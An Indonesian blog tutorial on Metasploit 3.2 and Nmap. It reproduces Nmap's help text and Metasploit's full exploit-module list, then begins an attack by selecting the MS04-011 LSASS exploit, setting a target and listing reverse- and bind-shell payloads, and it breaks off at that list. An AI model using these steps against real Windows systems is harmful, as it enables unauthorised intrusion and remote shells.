semoga hari ini makin indah. makasih dah mapir ke blog ku.
penjelasan tentang metasploit------> monggo ---->
sebelum saya jelaskan tentang penggunaan metasploit 3.2(versi terbaru) dengan gabungan namp (dipergunakan untuk scan port yang terbuka).
bagi yang belum tahu kegunaan metas monggo di cari di mbah Google
mohon jangan disalah gunakan untuk yang macam2, anggaplah ini untuk sebagai pembelajaran/pengetahuan dll. yang pnting tidak merugikan pihak lain. terima kasih.
bagi yang tidak asing dengan metas, monggo keliling, cari tutor lain di blog ini mugkin anda belum mencoba yang ini yang itu terserah, kalau sudah semua. terimakasih. kakean bacot.......
oke kita lanjutkan. to the point .....
sebelumna siapkan kopi + rokok..... (terserah rokok apa kek, yang penting keluar asap, knalpot boleh juga tuh, nek doyan).
selanjutna,
install metas na dulu.... bagi yang sudah punya software, bagi yang belum punya:....... nih situs na (http://www.metasploit.com). download dulu bro besarna cuman 36.7 mb,
oke,......
kalau sudah diinstall biasana langsung keluar otomatis tu aplikasina bro.
sebelum na buka cmd dulu (dos) guna kita melihat port yang terbuka. yaitu dengan Nmap.
nih contoh na........
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\By_dit>nmap
Nmap 4.76 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL
-iR
--exclude
--excludefile
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO [protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers
--system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags
-sI
-sO: IP protocol scan
-b
--traceroute: Trace hop path to each host
--reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
-p
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports
--port-ratio
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=
directories, script-files or script-categories
--script-args=
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take
____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux
msf > show exploits
Exploits
========
Name Description
---- -----------
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
freebsd/tacacs/xtacacsd_report XTACACSD <= 4.1.2 report() Buffer Overflow
hpux/lpd/cleanup_exec HP-UX LPD Command Execution
irix/lpd/tagprinter_exec Irix LPD tagprinter Command Execution
linux/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Linux)
linux/http/gpsd_format_string Berlios GPSD Format String Vulnerability
linux/http/linksys_apply_cgi Linksys apply.cgi buffer overflow
linux/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
linux/ids/snortbopre Snort Back Orifice Pre-Preprocessor Remote Exploit
linux/imap/imap_uw_lsub UoW IMAP server LSUB Buffer Overflow
linux/madwifi/madwifi_giwscan_cb Madwifi SIOCGIWSCAN Buffer Overflow
linux/misc/gld_postfix GLD (Greylisting Daemon) Postfix Buffer Overflow
linux/misc/ib_inet_connect Borland InterBase INET_connect() Buffer Overflow
linux/misc/ib_jrd8_create_database Borland InterBase jrd8_create_database() Buffer Overflow
linux/misc/ib_open_marker_file Borland InterBase open_marker_file() Buffer Overflow
linux/misc/ib_pwd_db_aliased Borland InterBase PWD_db_aliased() Buffer Overflow
linux/mysql/mysql_yassl MySQL yaSSL SSL Hello Message Buffer Overflow
linux/pptp/poptop_negative_read Poptop Negative Read Overflow
linux/proxy/squid_ntlm_authenticate Squid NTLM Authenticate Overflow
linux/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow
multi/browser/firefox_queryinterface Firefox location.QueryInterface() Code Execution
multi/browser/mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
multi/browser/mozilla_navigatorjava Mozilla Suite/Firefox Navigator Object Code Execution
multi/browser/qtjava_pointer Apple QTJava toQTPointer() Arbitrary Memory Access
multi/handler Generic Payload Handler
multi/misc/openview_omniback_exec HP OpenView OmniBack II Command Execution
multi/misc/veritas_netbackup_cmdexec VERITAS NetBackup Remote Command Execution
multi/ntp/ntp_overflow NTP daemon readvar Buffer Overflow
multi/php/php_unserialize_zval_cookie PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
multi/realserver/describe RealServer Describe Buffer Overflow
multi/samba/nttrans Samba nttrans Overflow
multi/svn/svnserve_date Subversion Date Svnserve
netware/smb/lsass_cifs Novell NetWare LSASS CIFS.NLM Driver Stack Overflow
osx/afp/loginext AppleFileServer LoginExt PathName Overflow
osx/arkeia/type77 Arkeia Backup Client Type 77 Overflow (Mac OS X)
osx/armle/safari_libtiff iPhone MobileSafari LibTIFF Buffer Overflow
osx/browser/safari_libtiff iPhone MobileSafari LibTIFF Buffer Overflow
osx/browser/safari_metadata_archive Safari Archive Metadata Command Execution
osx/browser/software_update Apple OS X Software Update Command Execution
osx/email/mailapp_image_exec Mail.app Image Attachment Command Execution
osx/email/mobilemail_libtiff iPhone MobileMail LibTIFF Buffer Overflow
osx/ftp/webstar_ftp_user WebSTAR FTP Server USER Overflow
osx/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow
osx/samba/trans2open Samba trans2open Overflow (Mac OS X)
solaris/dtspcd/heap_noir Solaris dtspcd Heap Overflow
solaris/lpd/sendmail_exec Solaris LPD Command Execution
solaris/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow
solaris/samba/trans2open Samba trans2open Overflow (Solaris SPARC)
solaris/sunrpc/sadmind_adm_build_path Sun Solaris sadmind adm_build_path() Buffer Overflow
solaris/sunrpc/sadmind_exec Solaris sadmind Command Execution
solaris/sunrpc/ypupdated_exec Solaris ypupdated Command Execution
solaris/telnet/fuser Sun Solaris Telnet Remote Authentication Bypass Vulnerability
solaris/telnet/ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
test/aggressive Internal Aggressive Test Exploit
test/exploitme MIPS Aggressive Test Exploit
test/kernel Internal Kernel-mode Test Exploit
unix/misc/distcc_exec DistCC Daemon Command Execution
unix/misc/spamassassin_exec SpamAssassin spamd Remote Command Execution
unix/smtp/clamav_milter_blackhole ClamAV Milter Blackhole-Mode Remote Code Execution
unix/webapp/awstats_configdir_exec AWStats configdir Remote Command Execution
unix/webapp/barracuda_img_exec Barracuda IMG.PL Remote Command Execution
unix/webapp/cacti_graphimage_exec Cacti graph_view.php Remote Command Execution
unix/webapp/google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
unix/webapp/guestbook_ssi_exec Matt Wright guestbook.pl Arbitrary Command Execution
unix/webapp/openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
unix/webapp/pajax_remote_exec PAJAX Remote Command Execution
unix/webapp/php_eval Generic PHP Code eval
unix/webapp/php_include PHP Include Generic Exploit
unix/webapp/php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
unix/webapp/php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
unix/webapp/php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
unix/webapp/phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
unix/webapp/sphpblog_file_upload Simple PHP Blog <= 0.4.0 Remote Command Execution
unix/webapp/squirrelmail_pgp_plugin SquirrelMail PGP Plugin command execution (SMTP)
windows/antivirus/symantec_rtvscan Symantec Remote Management Buffer Overflow
windows/antivirus/trendmicro_serverprotect Trend Micro ServerProtect 5.58 Buffer Overflow
windows/antivirus/trendmicro_serverprotect_createbinding Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
windows/antivirus/trendmicro_serverprotect_earthagent Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
windows/arkeia/type77 Arkeia Backup Client Type 77 Overflow (Win32)
windows/backupexec/name_service Veritas Backup Exec Name Service Overflow
windows/backupexec/remote_agent Veritas Backup Exec Windows Remote Agent Overflow
windows/brightstor/discovery_tcp CA BrightStor Discovery Service TCP Overflow
windows/brightstor/discovery_udp CA BrightStor Discovery Service Overflow
windows/brightstor/etrust_itm_alert Computer Associates Alert Notification Buffer Overflow
windows/brightstor/hsmserver CA BrightStor HSM Buffer Overflow
windows/brightstor/lgserver CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/lgserver_rxrlogin CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/lgserver_rxsuselicenseini CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Overflow
windows/brightstor/message_engine CA BrightStor ARCserve Message Engine Buffer Overflow
windows/brightstor/message_engine_heap CA BrightStor ARCserve Message Engine Heap Overflow
windows/brightstor/sql_agent CA BrightStor Agent for Microsoft SQL Overflow
windows/brightstor/tape_engine CA BrightStor ARCserve Tape Engine Buffer Overflow
windows/brightstor/universal_agent CA BrightStor Universal Agent Overflow
windows/browser/aim_goaway AOL Instant Messenger goaway Overflow
windows/browser/ani_loadimage_chunksize Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
windows/browser/apple_itunes_playlist Apple ITunes 4.7 Playlist Buffer Overflow
windows/browser/apple_quicktime_rtsp Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
windows/browser/ask_shortformat Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
windows/browser/bearshare_setformatlikesample BearShare 6 ActiveX Control Buffer Overflow
windows/browser/creative_software_cachefolder Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
windows/browser/enjoysapgui_preparetoposthtml EnjoySAP SAP GUI ActiveX Control Buffer Overflow
windows/browser/facebook_extractiptc Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
windows/browser/gom_openurl GOM Player ActiveX Control Buffer Overflow
windows/browser/hploadrunner HP LoadRunner 9.0 ActiveX Buffer Overflow
windows/browser/hpmqc_progcolor HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
windows/browser/ibmlotusdomino_dwa_uploadmodule IBM Lotus Domino Web Access Upload Module Buffer Overflow
windows/browser/ie_createobject Internet Explorer COM CreateObject Code Execution
windows/browser/ie_iscomponentinstalled Internet Explorer isComponentInstalled Overflow
windows/browser/kazaa_altnet_heap Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
windows/browser/logitechvideocall_start Logitech VideoCall ActiveX Control Buffer Overflow
windows/browser/lpviewer_url iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
windows/browser/macrovision_downloadandexecute Macrovision InstallShield Update Service Buffer Overflow
windows/browser/macrovision_unsafe Macrovision InstallShield Update Service ActiveX Unsafe Method
windows/browser/mcafee_mcsubmgr_vsprintf McAfee Subscription Manager Stack Overflow
windows/browser/mcafeevisualtrace_tracetarget McAfee Visual Trace ActiveX Control Buffer Overflow
windows/browser/mirc_irc_url mIRC IRC URL Buffer Overflow
windows/browser/ms03_020_ie_objecttype MS03-020 Internet Explorer Object Type
windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
windows/browser/ms06_013_createtextrange Internet Explorer createTextRange() Code Execution
windows/browser/ms06_055_vml_method Internet Explorer VML Fill Method Code Execution
windows/browser/ms06_057_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Overflow
windows/browser/ms06_067_keyframe Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
windows/browser/ms06_071_xml_core Internet Explorer XML Core Services HTTP Request Handling
windows/browser/ms08_041_snapshotviewer Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
windows/browser/ms08_053_mediaencoder Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
windows/browser/nis2004_get Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
windows/browser/novelliprint_executerequest Novell iPrint Client ActiveX Control Buffer Overflow
windows/browser/novelliprint_getdriversettings Novell iPrint Client ActiveX Control Buffer Overflow
windows/browser/realplayer_console RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
windows/browser/realplayer_import RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
windows/browser/realplayer_smil RealNetworks RealPlayer SMIL Buffer Overflow
windows/browser/softartisans_getdrivename SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
windows/browser/sonicwall_addrouteentry SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
windows/browser/symantec_backupexec_pvcalendar Symantec BackupExec Calendar Control Buffer Overflow
windows/browser/systemrequirementslab_unsafe Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
windows/browser/trendmicro_officescan Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
windows/browser/tumbleweed_filetransfer Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
windows/browser/winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow
windows/browser/winamp_ultravox Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
windows/browser/windvd7_applicationtype WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
windows/browser/xmplay_asx XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
windows/browser/yahoomessenger_fvcom Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
windows/browser/yahoomessenger_server Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
windows/browser/zenturiprogramchecker_unsafe Zenturi ProgramChecker ActiveX Control Arbitrary File Download.
windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow
windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow
windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow
windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
windows/driver/broadcom_wifi_ssid Broadcom Wireless Driver Probe Response SSID Overflow
windows/driver/dlink_wifi_rates D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
windows/driver/netgear_wg111_beacon NetGear WG111v2 Wireless Driver Long Beacon Overflow
windows/email/ani_loadimage_chunksize Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)
windows/emc/alphastor_agent EMC AlphaStor Agent Buffer Overflow
windows/firewall/blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
windows/firewall/kerio_auth Kerio Firewall 2.1.4 Authentication Packet Overflow
windows/ftp/3cdaemon_ftp_user 3Com 3CDaemon 2.0 FTP Username Overflow
windows/ftp/cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow
windows/ftp/dreamftp_format BolinTech Dream FTP Server 1.02 Format String
windows/ftp/easyfilesharing_pass Easy File Sharing FTP Server 2.0 PASS Overflow
windows/ftp/filecopa_list_overflow FileCopa FTP Server pre 18 Jul Version
windows/ftp/freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
windows/ftp/freeftpd_user freeFTPd 1.0 Username Overflow
windows/ftp/globalscapeftp_input GlobalSCAPE Secure FTP Server Input Overflow
windows/ftp/leapftp_pasv_reply LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
windows/ftp/netterm_netftpd_user NetTerm NetFTPD USER Buffer Overflow
windows/ftp/oracle9i_xdb_ftp_pass Oracle 9i
windows/ftp/oracle9i_xdb_ftp_unlock Oracle 9i XDB FTP UNLOCK Overflow (win32)
windows/ftp/sami_ftpd_user KarjaSoft Sami FTP Server v2.02 USER Overflow
windows/ftp/sasser_ftpd_port Sasser Worm avserve
windows/ftp/servu_mdtm Serv-U FTPD MDTM Overflow
windows/ftp/slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
windows/ftp/warftpd_165_pass War-FTPD 1.65 Password Overflow
windows/ftp/warftpd_165_user War-FTPD 1.65 Username Overflow
windows/ftp/wftpd_size Texas Imperial Software WFTPD 3.23 SIZE Overflow
windows/ftp/wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
windows/ftp/wsftp_server_505_xmd5 Ipswitch WS_FTP Server 5.05 XMD5 Overflow
windows/games/mohaa_getinfo Medal Of Honor Allied Assault getinfo Stack Overflow
windows/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Win32)
windows/http/altn_webadmin Alt-N WebAdmin USER Buffer Overflow
windows/http/apache_chunked Apache Win32 Chunked Encoding
windows/http/apache_modjk_overflow Apache mod_jk 1.2.20 Buffer Overflow
windows/http/badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
windows/http/badblue_passthru BadBlue 2.72b PassThru Buffer Overflow
windows/http/bea_weblogic_transfer_encoding BEA Weblogic Transfer-Encoding Buffer Overflow
windows/http/ca_igateway_debug CA iTechnology iGateway Debug Mode Buffer Overflow
windows/http/edirectory_host Novell eDirectory NDS Server Host Header Overflow
windows/http/edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
windows/http/hp_nnm HP OpenView Network Node Manager CGI Buffer Overflow
windows/http/ia_webmail IA WebMail 3.x Buffer Overflow
windows/http/ibm_tpmfosd_overflow IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
windows/http/ibm_tsm_cad IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
windows/http/icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
windows/http/ipswitch_wug_maincfgret Ipswitch WhatsUp Gold 8.03 Buffer Overflow
windows/http/mailenable_auth_header MailEnable Authorization Header Buffer Overflow
windows/http/maxdb_webdbm_database MaxDB WebDBM Database Parameter Overflow
windows/http/maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
windows/http/mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtectionPilot Overflow
windows/http/minishare_get_overflow Minishare 1.4.1 Buffer Overflow
windows/http/navicopa_get_overflow NaviCOPA 2.0.1 URL Handling Buffer Overflow
windows/http/novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
windows/http/nowsms Now SMS/MMS Gateway Buffer Overflow
windows/http/oracle9i_xdb_pass Oracle 9i
windows/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
windows/http/privatewire_gateway Private Wire Gateway Buffer Overflow
windows/http/psoproxy91_overflow PSO Proxy v0.91 Stack Overflow
windows/http/sapdb_webtools SAP DB 7.4 WebTools Buffer Overflow
windows/http/savant_31_overflow Savant 3.1 Web Server Overflow
windows/http/shoutcast_format SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
windows/http/shttpd_post SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
windows/http/sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow
windows/http/trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
windows/http/trendmicro_officescan Trend Micro OfficeScan Remote Stack Overflow
windows/http/xitami_if_mod_since Xitami 2.5c2 Web Server If-Modified-Since Overflow
windows/iis/ms01_023_printer Microsoft IIS 5.0 Printer Host Header Overflow
windows/iis/ms01_033_idq Microsoft IIS 5.0 IDQ Path Overflow
windows/iis/ms02_018_htr Microsoft IIS 4.0 .HTR Path Overflow
windows/iis/ms03_007_ntdll_webdav Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
windows/imap/eudora_list Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
windows/imap/imail_delete IMail IMAP4D Delete Overflow
windows/imap/ipswitch_search Ipswitch IMail IMAP SEARCH Buffer Overflow
windows/imap/mailenable_login MailEnable IMAPD (2.35) Login Request Buffer Overflow
windows/imap/mailenable_status MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
windows/imap/mailenable_w3c_select MailEnable IMAPD W3C Logging Buffer Overflow
windows/imap/mdaemon_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
windows/imap/mdaemon_fetch MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
windows/imap/mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
windows/imap/mercur_login Mercur Messaging 2005 IMAP Login Buffer Overflow
windows/imap/mercury_login Mercury/32 <= 4.01b LOGIN Buffer Overflow
windows/imap/mercury_rename Mercury/32 v4.01a IMAP RENAME Buffer Overflow
windows/imap/novell_netmail_append Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
windows/imap/novell_netmail_auth Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
windows/imap/novell_netmail_status Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
windows/imap/novell_netmail_subscribe Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
windows/isapi/fp30reg_chunked Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
windows/isapi/ms00_094_pbserver Microsoft IIS Phone Book Service Overflow
windows/isapi/nsiislog_post Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
windows/isapi/rsa_webagent_redirect Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
windows/isapi/w3who_query Microsoft IIS ISAPI w3who.dll Query String Overflow
windows/ldap/imail_thc IMail LDAP Service Buffer Overflow
windows/license/sentinel_lm7_udp SentinelLM UDP Buffer Overflow
windows/lotus/domino_sametime_stmux Lotus Domino Sametime STMux.exe Stack Overflow
windows/lpd/hummingbird_exceed Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
windows/lpd/niprint NIPrint LPD Request Overflow
windows/lpd/saplpd SAP SAPLPD 6.28 Buffer Overflow
windows/lpd/wincomlpd_admin WinComLPD <= 3.0.2 Buffer Overflow
windows/misc/apple_quicktime_rtsp_response Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
windows/misc/asus_dpcproxy_overflow Asus Dpcproxy Buffer Overflow
windows/misc/bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
windows/misc/bigant_server BigAnt Server 2.2 Buffer Overflow
windows/misc/bomberclone_overflow Bomberclone 0.11.6 Buffer Overflow
windows/misc/borland_interbase Borland Interbase Create-Request Buffer Overflow
windows/misc/borland_starteam Borland CaliberRM StarTeam Multicast Service Buffer Overflow
windows/misc/doubletake DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
windows/misc/eiqnetworks_esa eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
windows/misc/eiqnetworks_esa_topology eIQNetworks ESA Topology DELETEDEVICE Overflow
windows/misc/fb_isc_attach_database Firebird Relational Database isc_attach_database() Buffer Overflow
windows/misc/fb_isc_create_database Firebird Relational Database isc_create_database() Buffer Overflow
windows/misc/fb_svc_attach Firebird Relational Database SVC_attach() Buffer Overflow
windows/misc/hp_ovtrace HP OpenView Operations OVTrace Buffer Overflow
windows/misc/ib_isc_attach_database Borland InterBase isc_attach_database() Buffer Overflow
windows/misc/ib_isc_create_database Borland InterBase isc_create_database() Buffer Overflow
windows/misc/ib_svc_attach Borland InterBase SVC_attach() Buffer Overflow
windows/misc/landesk_aolnsrvr LANDesk Management Suite 8.7 Alert Service Buffer Overflow
windows/misc/mercury_phonebook Mercury/32 <= v4.01b PH Server Module Buffer Overflow
windows/misc/ms07_064_sami Microsoft DirectX DirectShow SAMI Buffer Overflow
windows/misc/netcat110_nt Netcat v1.10 NT Stack Overflow
windows/misc/shixxnote_font ShixxNOTE 6.net Font Field Overflow
windows/misc/tiny_identd_overflow TinyIdentD 2.2 Stack Overflow
windows/misc/windows_rsh Windows RSH daemon Buffer Overflow
windows/mssql/ms02_039_slammer Microsoft SQL Server Resolution Overflow
windows/mssql/ms02_056_hello Microsoft SQL Server Hello Overflow
windows/mysql/mysql_yassl MySQL yaSSL SSL Hello Message Buffer Overflow
windows/nntp/ms05_030_nntp Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
windows/novell/groupwisemessenger_client Novell GroupWise Messenger Client Buffer Overflow
windows/novell/nmap_stor Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
windows/novell/zenworks_desktop_agent Novell ZENworks 6.5 Desktop/Server Management Overflow
windows/pop3/seattlelab_pass Seattle Lab Mail 5.5 POP3 Buffer Overflow
windows/proxy/bluecoat_winproxy_host Blue Coat WinProxy Host Header Overflow
windows/proxy/ccproxy_telnet_ping CCProxy <= v6.2 Telnet Proxy Ping Overflow
windows/proxy/proxypro_http_get Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
windows/scada/realwin DATAC RealWin SCADA Server Buffer Overflow
windows/sip/aim_triton_cseq AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
windows/smb/ms03_049_netapi Microsoft Workstation Service NetAddAlternateComputerName Overflow
windows/smb/ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
windows/smb/ms04_011_lsass Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
windows/smb/psexec Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay Microsoft Windows SMB Relay Code Execution
windows/smtp/mailcarrier_smtp_ehlo TABS MailCarrier v2.51 SMTP EHLO Overflow
windows/smtp/mercury_cram_md5 Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
windows/smtp/wmailserver SoftiaCom WMailserver 1.0 Buffer Overflow
windows/smtp/ypops_overflow1 YPOPS 0.6 Buffer Overflow
windows/ssh/freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
windows/ssh/putty_msg_debug PuTTy.exe <= v0.53 Buffer Overflow
windows/ssh/securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
windows/ssl/ms04_011_pct Microsoft Private Communications Transport Overflow
windows/telnet/gamsoft_telsrv_username GAMSoft TelSrv 1.5 Username Buffer Overflow
windows/telnet/goodtech_telnet GoodTech Telnet Server <= 5.0.6 Buffer Overflow
windows/tftp/attftp_long_filename Allied Telesyn TFTP Server 1.9 Long Filename Overflow
windows/tftp/futuresoft_transfermode FutureSoft TFTP Server 2000 Transfer-Mode Overflow
windows/tftp/quick_tftp_pro_mode Quick FTP Pro 2.1 Transfer-Mode Overflow
windows/tftp/tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow
windows/tftp/tftpdwin_long_filename TFTPDWIN v0.4.2 Long Filename Buffer Overflow
windows/tftp/threectftpsvc_long_mode 3CTftpSvc TFTP Long Mode Buffer Overflow
windows/unicenter/cam_log_security CA CAM log_security() Stack Overflow (Win32)
windows/vnc/realvnc_client RealVNC 3.3.7 Client Buffer Overflow
windows/vnc/ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow
windows/vnc/winvnc_http_get WinVNC Web Server <= v3.3.3r7 GET Overflow
windows/wins/ms04_045_wins Microsoft WINS Service Memory Overwrite
msf > use windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set target 2
target => 2
msf exploit(ms04_011_lsass) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager
generic/debug_trap/reverse_ipv6_tcp Generic x86 Debug Trap, Reverse TCP Stager (IPv6)
generic/debug_trap/reverse_nonx_tcp Generic x86 Debug Trap, Reverse TCP Stager (No NX Support)
generic/debug_trap/reverse_ord_tcp Generic x86 Debug Trap, Reverse Ordinal TCP Stager
generic/debug_trap/reverse_tcp Generic x86 Debug Trap, Reverse TCP Stager
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline
windows/adduser Windows Execute net user /ADD
